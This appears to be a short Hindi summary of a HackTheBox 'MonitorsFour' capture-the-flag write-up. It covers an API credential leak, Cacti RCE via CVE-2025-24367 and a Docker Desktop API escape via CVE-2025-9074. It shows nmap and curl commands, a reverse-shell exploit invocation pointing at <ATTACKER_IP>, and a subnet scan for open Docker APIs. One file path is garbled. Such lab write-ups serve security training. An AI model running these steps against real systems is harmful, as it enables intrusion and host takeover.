
HackTheBox MonitorsFour walkthrough जिसमें credential leak, CVE-2025-24367 Cacti RCE, और CVE-2025-9074 Docker Desktop API container escape से root तक शामिल है।
प्लेटफ़ॉर्म: HackTheBox OS: Windows स्थिति: रिटायर्ड — पूरा वॉकथ्रू प्रकाशित।
पूरा वॉकथ्रू: l3dsec.com/walkthroughs/monitorsfour-htb
Nmap → nginx (80) + WinRM (5985)
→ ffuf → cacti.monitorsfour.htb (Cacti)
→ unauthenticated API endpoint → credentials
→ CVE-2025-24367 Cacti RCE → shell as www-data (Docker)
→ CVE-2025-9074 Docker Desktop API (192.168.65.x:2375)
→ mount host filesystem → root flag
nmap -sV -sC <TARGET_IP>
nmap -sV -sC <TARGET_IP> -p-
PORT STATE SERVICE VERSION
80/tcp open http nginx
5985/tcp open http Microsoft HTTPAPI httpd 2.0 (WinRM)
वर्चुअल होस्ट फ़ज़िंग से cacti.monitorsfour.htb का पता चला — एक Cacti नेटवर्क मॉनिटरिंग इंस्टेंस।
मुख्य डोमेन पर unauthenticated API endpoint उपयोगकर्ता खाता डेटा उजागर करता है जिसमें MD5 पासवर्ड हैश शामिल हैं:
curl -s "http://monitorsfour.htb/user?token=0"
MD5 हैश तुरंत क्रैक हो गया — Cacti के लिए वैध क्रेडेंशियल देता है।
Cacti इंस्टेंस Graph Template कार्यक्षमता के माध्यम से authenticated RCE के प्रति संवेदनशील:
nc -lvnp 9001
sudo python3 exploit.py \
-url http://cacti.monitorsfour.htb \
-u marcus \
-p <password> \
-i <ATTACKER_IP> \
-l 9001
Docker कंटेनर के अंदर www-data के रूप में शेल। यूज़र फ़्लैग /home/marcus/user.txt पर।
Docker सॉकेट माउंट नहीं है। Docker Desktop आंतरिक 192.168.65.0/24 सबनेट पर अपना Engine API unauthenticated रूप से उजागर करता है:
# Scan for open Docker API
for i in $(seq 1 254); do
(curl -s --connect-timeout 1 http://192.168.65.$i:2375/version 2>/dev/null \
| grep -q "ApiVersion" && echo "192.168.65.$i:2375 OPEN") &
done; wait
API के माध्यम से एक कंटेनर बनाया जो होस्ट C:\ ड्राइव को माउंट करता है, फिर C:sers\Administrator\Desktopoot.txt से रूट फ़्लैग पढ़ा।
| Flag | Value |
|---|---|
| User | redacted |
| Root | redacted |
केवल शैक्षिक उद्देश्यों के लिए। केवल उन सिस्टमों का परीक्षण करें जिनके आप मालिक हैं या जिनके परीक्षण के लिए आपके पास स्पष्ट लिखित अनुमति है।